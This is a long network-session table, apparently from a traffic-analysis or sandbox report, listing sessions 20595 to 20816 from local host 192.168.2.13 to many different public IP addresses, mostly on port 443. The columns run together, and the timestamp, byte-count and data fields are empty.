                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20595192.168.2.134040093.246.251.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20596192.168.2.1336024132.35.110.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20597192.168.2.1334764149.59.117.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20598192.168.2.135381814.125.102.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20599192.168.2.13360985.251.209.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20600192.168.2.1338118130.103.197.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20601192.168.2.1359588191.73.151.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20602192.168.2.1336736187.99.59.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20603192.168.2.134535617.231.66.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20604192.168.2.134658458.60.39.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20605192.168.2.136027248.215.57.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20606192.168.2.1354764124.137.124.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20607192.168.2.1358820211.25.207.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20608192.168.2.1349012136.213.52.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20609192.168.2.1336568185.177.228.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20610192.168.2.135654858.129.241.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20611192.168.2.135651627.244.5.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20612192.168.2.135498042.50.40.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20613192.168.2.134352680.179.60.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20614192.168.2.1347262208.2.200.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20615192.168.2.1352152172.67.7.1428080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20616192.168.2.1343864171.204.147.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20617192.168.2.1358876120.111.132.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20618192.168.2.133842251.184.154.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20619192.168.2.135389458.19.229.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20620192.168.2.1333548184.80.0.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20621192.168.2.1357820170.108.97.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20622192.168.2.134304032.156.35.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20623192.168.2.135682280.135.213.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20624192.168.2.134408659.253.132.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20625192.168.2.1337300109.136.35.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20626192.168.2.134600631.205.44.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20627192.168.2.135905091.238.4.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20628192.168.2.1358822139.50.33.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20629192.168.2.133918037.173.79.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20630192.168.2.1358950206.187.55.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20631192.168.2.1353028124.23.244.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20632192.168.2.1360722217.254.105.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20633192.168.2.1348512181.64.233.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20634192.168.2.134878861.96.28.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20635192.168.2.1343550112.243.85.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20636192.168.2.1334972193.34.170.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20637192.168.2.133470698.174.227.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20638192.168.2.1341448200.40.43.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20639192.168.2.1357594170.45.235.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20640192.168.2.1353484121.27.184.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20641192.168.2.135217666.5.82.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20642192.168.2.1333312217.153.22.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20643192.168.2.135549638.224.183.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20644192.168.2.133981268.179.136.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20645192.168.2.1350018162.114.249.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20646192.168.2.134832681.33.249.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20647192.168.2.1337084210.197.221.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20648192.168.2.1340054170.182.170.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20649192.168.2.1348298200.48.121.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20650192.168.2.134254073.234.120.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20651192.168.2.134472443.255.222.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20652192.168.2.134620686.183.49.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20653192.168.2.133454458.173.170.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20654192.168.2.1355854189.102.53.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20655192.168.2.1346096202.152.114.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20656192.168.2.1341606128.105.29.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20657192.168.2.1360920157.185.175.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20658192.168.2.1345164167.134.170.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20659192.168.2.135269662.34.175.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20660192.168.2.133430060.232.136.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20661192.168.2.1358000190.141.215.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20662192.168.2.133937296.234.255.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20663192.168.2.1333422114.156.43.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20664192.168.2.1335156170.227.200.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20665192.168.2.1353174189.120.14.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20666192.168.2.133654423.138.170.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20667192.168.2.1341540169.83.25.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20668192.168.2.134944250.195.111.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20669192.168.2.134906841.80.165.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20670192.168.2.1351870184.73.228.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20671192.168.2.1344738207.123.113.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20672192.168.2.1353094105.226.230.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20673192.168.2.1340540129.18.110.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20674192.168.2.1354496133.167.166.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20675192.168.2.1351276128.14.14.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20676192.168.2.1353736216.226.176.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20677192.168.2.1350966166.84.37.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20678192.168.2.134178446.64.182.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20679192.168.2.134964450.38.85.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20680192.168.2.133342481.98.107.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20681192.168.2.1340676151.166.179.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20682192.168.2.135698454.19.179.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20683192.168.2.1354176140.21.94.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20684192.168.2.1336980195.128.30.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20685192.168.2.1333498121.56.127.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20686192.168.2.1338416141.225.226.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20687192.168.2.1344754217.53.215.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20688192.168.2.1359852199.40.109.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20689192.168.2.1343578113.117.221.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20690192.168.2.1347344160.123.37.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20691192.168.2.1349350185.109.84.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20692192.168.2.134951449.173.68.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20693192.168.2.1343170152.244.159.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20694192.168.2.1339988172.252.62.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20695192.168.2.133399236.116.25.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20696192.168.2.133585275.130.147.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20697192.168.2.1356730141.39.130.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20698192.168.2.1344762211.150.162.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20699192.168.2.1358928114.100.205.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20700192.168.2.1341756212.176.75.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20701192.168.2.1349696111.83.253.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20702192.168.2.1341564208.214.53.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20703192.168.2.1349680134.32.55.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20704192.168.2.1346728122.21.120.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20705192.168.2.1343968139.129.74.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20706192.168.2.134859285.182.1.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20707192.168.2.134027458.220.201.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20708192.168.2.13459445.46.243.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20709192.168.2.135912254.194.115.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20710192.168.2.1360544149.242.253.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20711192.168.2.134995259.51.146.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20712192.168.2.1345310185.199.102.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20713192.168.2.1347158180.186.113.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20714192.168.2.13331504.0.53.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20715192.168.2.135045424.224.118.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20716192.168.2.1340094113.138.1.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20717192.168.2.1348696156.85.255.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20718192.168.2.1360402149.206.213.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20719192.168.2.1339428136.161.175.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20720192.168.2.1349910141.6.21.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20721192.168.2.1355532211.243.61.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20722192.168.2.135589649.255.116.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20723192.168.2.1352066171.185.172.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20724192.168.2.134821423.49.20.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20725192.168.2.1338248129.110.234.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20726192.168.2.1334922115.76.212.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20727192.168.2.1336700195.82.251.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20728192.168.2.1345248217.78.152.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20729192.168.2.134042052.113.205.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20730192.168.2.1351554223.94.117.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20731192.168.2.134150449.42.191.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20732192.168.2.1337716112.84.121.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20733192.168.2.135911820.240.183.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20734192.168.2.135656070.236.237.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20735192.168.2.1348842122.223.97.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20736192.168.2.13393805.255.24.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20737192.168.2.134448883.98.230.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20738192.168.2.135821073.91.91.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20739192.168.2.134807493.167.223.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20740192.168.2.135209276.159.36.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20741192.168.2.1341082131.200.17.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20742192.168.2.1336180142.240.29.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20743192.168.2.1340534101.246.62.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20744192.168.2.1342674142.149.150.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20745192.168.2.135312471.7.164.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20746192.168.2.135565427.76.145.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20747192.168.2.1333804181.177.52.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20748192.168.2.1345988126.227.28.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20749192.168.2.134884687.148.109.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20750192.168.2.1335134152.109.15.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20751192.168.2.133912617.110.213.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20752192.168.2.133614496.79.64.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20753192.168.2.1360648116.68.181.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20754192.168.2.134556441.56.140.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20755192.168.2.134824670.143.234.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20756192.168.2.1360706212.137.25.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20757192.168.2.1344674122.208.27.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20758192.168.2.136006298.191.88.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20759192.168.2.1358130194.20.119.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20760192.168.2.133723034.151.12.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20761192.168.2.133939662.118.126.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20762192.168.2.1336758211.154.97.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20763192.168.2.134037447.14.94.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20764192.168.2.13520969.57.170.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20765192.168.2.134026240.144.23.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20766192.168.2.1342588123.236.125.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20767192.168.2.1347942188.4.76.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20768192.168.2.1344286162.116.27.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20769192.168.2.133376672.14.111.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20770192.168.2.1338990113.246.105.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20771192.168.2.1343004138.145.218.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20772192.168.2.13401284.146.202.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20773192.168.2.134678685.124.209.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20774192.168.2.134552620.243.77.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20775192.168.2.1341454142.33.217.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20776192.168.2.1333946105.224.87.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20777192.168.2.1346736126.3.4.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20778192.168.2.133965273.61.104.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20779192.168.2.133713624.153.134.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20780192.168.2.134213690.254.173.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20781192.168.2.135808679.193.177.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20782192.168.2.133760842.252.239.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20783192.168.2.1359366160.162.219.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20784192.168.2.1352024152.205.142.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20785192.168.2.134919262.165.146.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20786192.168.2.1342206220.232.243.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20787192.168.2.1346288146.89.209.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20788192.168.2.133939448.220.97.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20789192.168.2.1352526123.73.31.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20790192.168.2.135526492.202.17.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20791192.168.2.1351644154.95.125.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20792192.168.2.1337212126.89.146.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20793192.168.2.133697213.46.126.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20794192.168.2.1349820123.80.107.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20795192.168.2.133644290.38.120.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20796192.168.2.136032448.51.105.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20797192.168.2.1354086191.213.18.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20798192.168.2.1357172151.111.193.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20799192.168.2.1343182205.168.79.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20800192.168.2.134623492.86.132.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20801192.168.2.1357666133.79.122.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20802192.168.2.1346476166.94.153.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20803192.168.2.133831851.74.88.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20804192.168.2.13455265.170.212.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20805192.168.2.1340798219.187.190.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20806192.168.2.1338444133.201.134.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20807192.168.2.1360798118.108.105.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20808192.168.2.1357062155.15.118.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20809192.168.2.1351058153.55.195.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20810192.168.2.1351586213.222.192.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20811192.168.2.135263472.138.115.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20812192.168.2.1342056152.250.232.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20813192.168.2.134799084.130.8.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20814192.168.2.1347534139.207.9.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20815192.168.2.1333070139.197.182.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20816192.168.2.134850646.2.178.71443
